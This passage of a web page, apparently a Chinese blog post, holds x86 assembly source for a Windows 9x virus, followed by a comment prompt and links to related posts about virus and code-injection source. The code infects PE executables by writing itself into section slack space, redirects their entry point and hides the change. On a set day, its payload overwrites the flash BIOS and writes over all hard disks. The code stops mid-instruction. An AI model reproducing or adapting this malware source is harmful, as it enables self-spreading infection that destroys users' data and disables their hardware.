; *************************************
; * Modify Read-Only File to Write *
; *************************************
mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Open File *
; *************************************
OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle
; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************
pop ecx
pushf
test cl, 01h
jz IsOpenFileOK
; *************************************
; * Restore Attributes of the File *
; *************************************
mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Is Open File OK !? *
; *************************************
IsOpenFileOK:
popf
jc DisableOnBusy
; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************
push esi ; Push FileNameBuffer Address to Stack
pushf ; Now CF = 0, Push Flag to Stack
add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
; ***************************
; * Get OffsetTonewHeader *
; ***************************
xor eax, eax
mov ah, 0d6h
; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax
push 00000004h
pop ecx
push 0000003ch
pop edx
call edi ; VXDCall IFSMgr_Ring0_FileIO
mov edx, [esi]
; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************
dec edx
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; ***************************
cmp dword ptr [esi], 00455000h
jne CloseFile
; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************
; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark
; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer
; ***************************
; * Save ESP Register *
; ***************************
mov dr1, esp
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
push eax ; Size
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h]
; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************
mov al, SizeOfScetionTable
; I Assume NumberOfSections <= 0ffh
mov cl, (NumberOfSections-@8)[esi]
mul cl
; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable
add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-@9)[esi]
not ecx
inc ecx
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table
; Save Original Address of Entry Point
mov eax, (AddressOfEntryPoint-@9)[esi]
add eax, (ImageBase-@9)[esi]
mov (OriginalAddressOfEntryPoint-@9)[esi], eax
cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
jl OnlySetInfectedMark
; ***************************
; * Read All Section Tables *
; ***************************
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; ***************************
xchg eax, ebp
push 00000004h
pop ecx
push edx
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
add edx, 12h
call edi ; VXDCall IFSMgr_Ring0_FileIO
cmp dword ptr [esi], 'piZniW'
je NotSetInfectedMark
pop edx
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, ebp
push edx ; Pointer of File
add ebp, esi
push ebp ; Address of Buffer
; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
lea eax, [ebp+edi-04h]
mov [eax], ebx
; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************
push ebx ; Size
add edx, edi
push edx ; Pointer of File
lea edi, (MyVirusStart-@9)[esi]
push edi ; Address of Buffer
; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
mov (NewAddressOfEntryPoint-@9)[esi], edx
; ***************************
; * Setup Initial Data *
; ***************************
lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize
jmp StartToWriteCodeToSections
; ***************************
; * Write Code to Sections *
; ***************************
LoopOfWriteCodeToSections:
add edx, SizeOfScetionTable
mov ebx, (SizeOfRawData-@9)[edx]
sub ebx, (VirtualSize-@9)[edx]
jbe EndOfWriteCodeToSections
push ebx ; Size
sub eax, 08h
mov [eax], ebx
mov ebx, (PointerToRawData-@9)[edx]
add ebx, (VirtualSize-@9)[edx]
push ebx ; Pointer of File
push edi ; Address of Buffer
mov ebx, (VirtualSize-@9)[edx]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (ImageBase-@9)[esi]
mov [eax+4], ebx
mov ebx, [eax]
add (VirtualSize-@9)[edx], ebx
; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or (Characteristics-@9)[edx], 40000040h
StartToWriteCodeToSections:
sub ebp, ebx
jbe SetVirusCodeSectionTableEndMark
add edi, ebx ; Move Address of Buffer
EndOfWriteCodeToSections:
loop LoopOfWriteCodeToSections
; ***************************
; * Only Set Infected Mark *
; ***************************
OnlySetInfectedMark:
mov esp, dr1
jmp WriteVirusCodeToFile
; ***************************
; * Not Set Infected Mark *
; ***************************
NotSetInfectedMark:
add esp, 3ch
jmp CloseFile
; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************
SetVirusCodeSectionTableEndMark:
; Adjust Size of Virus Section Code to Correct Value
add [eax], ebp
add [esp+08h], ebp
; Set End Mark
xor ebx, ebx
mov [eax-04h], ebx
; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************
lea eax, (LastVxDCallAddress-2-@9)[esi]
mov cl, VxDCallTableSize
LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh
mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
mov [eax+2], edx
movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
sub eax, edx
loop LoopOfRestoreVxDCallID
; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************
WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax+10h]
mov edi, [eax]
LoopOfWriteVirusCodeToFile:
pop ecx
jecxz SetFileModificationMark
mov esi, ecx
mov eax, 0d601h
pop edx
pop ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
jmp LoopOfWriteVirusCodeToFile
; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************
SetFileModificationMark:
pop ebx
pop eax
stc ; Enable CF(Carry Flag)
pushf
; *************************************
; * Close File *
; *************************************
CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************
popf
pop esi
jnc IsKillComputer
; *************************************
; * Restore File Modification Time *
; *************************************
mov ebx, edi
mov ax, 4303h
mov ecx, (FileModificationTime-@7)[esi]
mov edi, (FileModificationTime+2-@7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Disable OnBusy *
; *************************************
DisableOnBusy:
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy
; *************************************
; * Call Previous FileSystemApiHook *
; *************************************
prevhook:
popad
mov eax, dr0 ;
jmp [eax] ; Jump to prevhook
; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; *************************************
pIFSFunc:
mov ebx, esp
push dword ptr [ebx+20h+04h+14h] ; Push pioreq
call [ebx+20h+04h] ; Call pIFSFunc
pop ecx ;
mov [ebx+1ch], eax ; Modify EAX Value in Stack
; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************
cmp dword ptr [ebx+20h+04h+04h], 00000024h
jne QuitMyVirusFileSystemHook
; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************
mov eax, [ecx+28h]
mov (FileModificationTime-@6)[esi], eax
; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; ***************************
QuitMyVirusFileSystemHook:
popad
ret
; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************
IsKillComputer:
; Get Now Day from BIOS CMOS
mov al, 07h
out 70h, al
in al, 71h
xor al, 01h ; ??/26/????
IF DEBUG
jmp DisableOnBusy
ELSE
jnz DisableOnBusy
ENDIF
; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************
; ***************************
; * Kill BIOS EEPROM *
; ***************************
mov bp, 0cf8h
lea esi, IOForEEPROM-@7[esi]
; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; ***********************
mov edi, 8000384ch
mov dx, 0cfeh
cli
call esi
; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
mov di, 0058h
dec edx ; and al,0fh
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
call esi
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************
lea ebx, EnableEEPROMToWrite-@10[esi]
mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h
push ecx
loop $
; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; ***********************
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************
mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; ***********************
mov ah, 0e0h
mov [eax], al
; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
; or al,10h
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
call esi
; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
; ***************************
; * Enable EEPROM to Write *
; ***************************
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte
发表评论
-
堆和栈(堆栈)的区别
2010-05-20 16:47 866转自:http://www.360doc.com/sho ... -
OllyDBG 入门系列(三)-函数参考
2010-05-06 14:07 1390转自:http://bbs.pediy.com/s ... -
OllyDBG 入门系列(二)-字串参考
2010-05-05 19:02 1142转自:http://bbs.pediy.com/s ... -
用汇编编写DOS下的内存驻留程序(5)
2010-05-05 11:05 1022转自:http://www.x86asm.com/Dis ... -
用汇编编写DOS下的内存驻留程序(4)
2010-05-05 11:04 1170转自:http://www.x86asm.com/Displa ... -
用汇编编写DOS下的内存驻留程序(3)
2010-05-05 11:03 896转自:http://www.x86asm. ... -
用汇编编写DOS下的内存驻留程序(2)
2010-05-05 11:02 767转自:http://www.x86asm. ... -
用汇编编写DOS下的内存驻留程序(1)
2010-05-05 11:01 1503转自:http://www.x86 ... -
补码 左移与右移 32位系统
2010-05-02 11:04 2796QQ:797801 计算机中 ... -
c语言控制语句对应的汇编语句代码
2010-04-29 18:15 2253转:http://blog.csdn.net/ ... -
调试windows程序
2010-03-21 10:11 814debug 只能支持1M的寻址 如果需要调 ... -
ds:[bp+2]
2009-11-28 13:22 907mov ax,0 mov ds ... -
程序的起始地址的段地址
2009-11-26 09:38 1325生成EXE之后用Debug加载后,查看寄存器内容如下: ... -
将内存FFFF:0--FFFF:b单元中的数据复制到0:200--0:20b单元中
2009-10-25 21:13 1677该程序的功能: 将内存FFFF:0--FF ... -
标志寄存器
2009-10-25 18:46 999方便记忆 OF 溢出(是/否) ... -
安全的一段内存空间 0:2000~0:02FF
2009-10-25 18:20 950看到120页了 我们要向内存里写东西 ... -
显示红心的汇编代码
2009-10-25 18:05 923assume cs:code code segment ... -
debug时 遇到loop 指令
2009-10-25 17:35 901debug时 遇到loop 指令 用 p指 ... -
Loop的使用
2009-10-23 21:06 1216看到107页了 王爽汇编第五章 Loop的使用 ... -
王爽汇编的第四章的一个小例子--待验证
2009-10-20 21:02 1171第四章的一些总结: 1. DOS系统是单任 ...
相关推荐
2. **病毒感染机制**:病毒感染的过程通常包括定位可感染的目标文件、读取文件内容、在合适位置插入病毒代码、修改文件头信息以确保病毒代码首先执行,然后将修改后的文件写回磁盘。 3. **汇编语法**:汇编语言的...
2. **病毒代码构造**:许多早期的DOS病毒都是用汇编语言编写的,因为这样能最小化病毒体大小,提高传染速度。汇编语言也使得病毒可以绕过某些安全检查,增加其复杂性和生存能力。 3. **解密和隐藏技术**:汇编语言...
【汇编代码注入工具call工具】是一种用于在目标进程中注入汇编代码的实用程序,它允许程序员或安全研究员实现远程函数调用。汇编代码注入是计算机编程中的一个技术,通常用于调试、性能优化或者安全渗透测试。在这个...
例如,添加代码可能涉及到在合适的位置插入跳转指令,以使程序在执行时转移到病毒代码。 6. **安全性挑战**:这种行为对网络安全构成了严重威胁,因为被感染的PE文件可能传播病毒,导致数据丢失、系统崩溃或隐私...
8. **安全与隐蔽**:由于远程代码注入可能被视为恶意行为,因此通常会采取一些措施来隐藏注入活动,如使用复杂的注入技术、混淆代码、避开反病毒软件的检测等。 在【CodeInEX_dong.exe】这个文件中,很可能是实现...
CIH病毒的作者使用了汇编语言编写,这些文件可能是分析或逆向工程CIH病毒的代码片段,帮助学习者理解病毒的工作原理和如何防止类似的攻击。 2. **CMOSBOOT.asm**: CMOS是计算机中的非易失性存储器,用于存储BIOS...
例如,通过替换某些效率低下的原生代码,用更高效的汇编代码替代,可以提升关键操作的速度。此外,还可以用于修复某些软件的bug,尤其是在源代码不可得的情况下。 在**安全研究**中,代码注入是逆向工程和漏洞利用...
5. **汇编与高级语言交互**:如何在C/C++等高级语言中嵌入汇编代码,或者用汇编实现C/C++的函数。 6. **调试技术**:使用调试工具分析和调试汇编代码,例如使用GDB。 7. **可执行文件格式**:介绍PE(Windows)或...
"汇编语言实现插入恶意代码"这个话题涉及到的是利用汇编语言编写病毒、木马或其他恶意软件,并将这些代码巧妙地插入到合法程序中,以达到攻击或控制目标系统的目的。 汇编语言是低级语言,它与机器语言非常接近,每...
《汇编代码注入工具详解》 在信息技术领域,汇编代码注入是一种高级技术,它涉及到程序执行流程的操控,常用于系统调试、安全研究以及恶意软件的开发。本篇文章将深入探讨“汇编代码注入工具”这一主题,帮助读者...
感染com文件的DOS病毒汇编代码,原理性的 无危险性
系统内核、病毒与汇编文章收集总汇 内容包括(绝对无毒): 《天书夜读:从汇编语言到Windows内核编程》.pdfKmd教程1、2-内核模式驱动程序基础.txt PE型病毒编写总结 .txt Ring0代码实现.txt u盘病毒的原理.txt Win...
反汇编软件是一种工具,它的主要任务是将已经编译好的机器码程序转换为人类可读的汇编语言代码。这种技术在软件分析、逆向工程、漏洞发现和安全研究等领域有着广泛的应用。标题提到的“反汇编软件 将一个软件反汇编...
在本例中,"ycsrc汇编加壳代码.rar" 提供的是一个用汇编语言编写的加壳工具的源代码。汇编语言是低级编程语言,直接对应机器指令,因此使用汇编编写加壳工具可以更精确地控制程序的行为。 汇编加壳技术通常包括以下...
本资源包主要涵盖了汇编语言和C++在病毒分析方面的应用,特别是针对Windows 32位系统的病毒解析。下面将详细介绍其中涉及的知识点。 1. **汇编语言与病毒分析**:汇编语言是计算机底层编程的基础,它允许程序员直接...
2. **插入病毒代码**:找到合适的插入位置(如某个节的末尾),并插入病毒代码。 3. **更新文件信息**:修改PE文件的头部信息,以反映文件大小、入口点等的变化。 4. **保存修改后的文件**:将修改后的内容写回到...
利用23位汇编语言实现Windows系统引导型病毒及其运行传播机理
3. **内存操作**:恶意软件可能在内存中动态生成代码或修改已存在的进程,研究汇编代码可以揭示这些隐蔽的内存操作。 4. **系统调用利用**:“鬼影下载者”可能会滥用系统调用来获取权限、隐藏自身或与其他恶意组件...
- **反病毒与安全研究**:理解和编写汇编代码有助于分析恶意软件行为、逆向工程及编写防病毒软件。 - **教学与理解计算机原理**:学习汇编语言有助于深入理解计算机体系结构、指令集、内存管理和硬件接口等基础概念...